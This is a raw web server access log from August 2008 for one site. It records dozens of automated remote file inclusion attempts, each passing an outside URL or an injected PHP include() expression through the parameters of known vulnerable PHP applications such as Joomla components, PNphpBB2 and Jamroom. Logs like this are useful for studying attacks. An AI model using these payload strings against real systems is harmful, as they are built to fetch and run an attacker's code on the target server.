69.210.185.1 - - [21/Aug/2008:06:08:49 -0700] "GET //index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:49 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:53 -0700] "GET //index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:53 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:53 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
83.148.101.224 - - [21/Aug/2008:06:09:11 -0700] "GET /logs/access_080804.log//index.php?lang=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
83.148.101.224 - - [21/Aug/2008:06:09:11 -0700] "GET //index.php?lang=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:09:25 -0700] "GET /logs/access_080809.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:09:25 -0700] "GET /logs/access_080809.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:09:26 -0700] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:09:27 -0700] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:09:28 -0700] "GET /logs/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:09:28 -0700] "GET /logs/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
83.148.101.224 - - [21/Aug/2008:06:09:41 -0700] "GET /logs/access_080804.log//index.php?lang=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
83.148.101.224 - - [21/Aug/2008:06:09:41 -0700] "GET //index.php?lang=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
83.148.101.224 - - [21/Aug/2008:06:09:41 -0700] "GET /logs//index.php?lang=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:10:09 -0700] "GET //skin/zero_vote/error.php?dir=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:10:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:10:09 -0700] "GET /logs/access_080813.log//skin/zero_vote/error.php?dir=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:10:21 -0700] "GET /logs/access_080804.log//skin/zero_vote/error.php?dir=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:25 -0700] "GET /logs/access.log/purchase.php?jamroom[jm_dir]=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:25 -0700] "GET /purchase.php?jamroom[jm_dir]=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:25 -0700] "GET /logs/purchase.php?jamroom[jm_dir]=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:27 -0700] "GET /logs/access.log/purchase.php?jamroom[jm_dir]=http://www.psgpoland.com//cmstest/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:27 -0700] "GET /purchase.php?jamroom[jm_dir]=http://www.psgpoland.com//cmstest/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:27 -0700] "GET /logs/purchase.php?jamroom[jm_dir]=http://www.psgpoland.com//cmstest/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:29 -0700] "GET /logs/access.log/purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:29 -0700] "GET /purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:29 -0700] "GET /logs/purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:34 -0700] "GET /logs/access_080804.log/purchase.php?jamroom[jm_dir]=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:34 -0700] "GET /logs/access_080804.log/purchase.php?jamroom[jm_dir]=http://www.psgpoland.com//cmstest/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:36 -0700] "GET /logs/access_080804.log/purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:10:38 -0700] "GET /logs/access.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:10:47 -0700] "GET /logs/access_080815.log%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:51 -0700] "GET /logs/access.log/purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:51 -0700] "GET /purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:51 -0700] "GET /logs/purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
77.79.246.241 - - [21/Aug/2008:06:10:59 -0700] "GET /logs/access_080804.log/purchase.php?jamroom[jm_dir]=http://ace.43i.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
69.26.234.69 - - [21/Aug/2008:06:11:04 -0700] "GET /purchase.php?jamroom[jm_dir]=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.heyhovies.com"
69.26.234.69 - - [21/Aug/2008:06:11:04 -0700] "GET /logs/purchase.php?jamroom[jm_dir]=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:06:11:06 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:06:11:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:06:11:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:12:48 -0700] "GET /logs/access_080801.log//admin/business_inc/saveserver.php?thisdir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:14:09 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:17:24 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
89.229.79.215 - - [21/Aug/2008:06:24:33 -0700] "GET /logs/access_080809.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.229.79.215 - - [21/Aug/2008:06:24:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.229.79.215 - - [21/Aug/2008:06:24:34 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:26:52 -0700] "GET /logs/access_080813.log//advanced/advanced1.php?pluginpath[0]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:26:56 -0700] "GET //advanced/advanced1.php?pluginpath[0]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:26:57 -0700] "GET /logs//advanced/advanced1.php?pluginpath[0]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:27:30 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:27:30 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:27:30 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
81.177.3.99 - - [21/Aug/2008:06:27:42 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:15 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:15 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:15 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:20 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:20 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:20 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:40 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:46 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:28:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.229.79.215 - - [21/Aug/2008:06:29:02 -0700] "GET /logs/access_080724.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:06:31:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:06:31:07 -0700] "GET //ashnews.php?pathtoashnews=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:06:31:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:06:31:12 -0700] "GET /logs/access_080809.log//ashnews.php?pathtoashnews=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:31:46 -0700] "GET /logs/access_080815.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:31:46 -0700] "GET /logs/access_080815.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:06:33:03 -0700] "GET //ashnews.php?pathtoashnews=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
200.213.33.2 - - [21/Aug/2008:06:35:43 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
200.213.33.2 - - [21/Aug/2008:06:35:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:41:22 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:41:23 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:41:24 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:41:48 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/anangedan.com/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:41:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/anangedan.com/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:41:50 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/anangedan.com/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.129.97.30 - - [21/Aug/2008:06:41:54 -0700] "GET /?sourcedir=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.heyhovies.com"
89.129.97.30 - - [21/Aug/2008:06:41:59 -0700] "GET /logs/access_080724.log/?sourcedir=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
89.129.97.30 - - [21/Aug/2008:06:42:02 -0700] "GET /logs/access_080731.log/?sourcedir=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:43:41 -0700] "GET /logs/access_080724.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:43:42 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:43:43 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:44:24 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:06:44:31 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/anangedan.com/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:06:44:33 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:06:44:34 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
193.254.184.38 - - [21/Aug/2008:06:44:36 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.handowire.com/bbs/Paddy/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:47:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:47:24 -0700] "GET /logs/access_080815.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:47:24 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:48:47 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:48:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:48:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:49:27 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:49:27 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:06:49:27 -0700] "GET /logs/access_080815.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
76.195.200.137 - - [21/Aug/2008:06:49:32 -0700] "GET /logs/access_080804.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
76.195.200.137 - - [21/Aug/2008:06:49:32 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:06:50:26 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:39 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:39 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:41 -0700] "GET /logs/access_080804.log//index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:42 -0700] "GET //index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:42 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:06:50:43 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
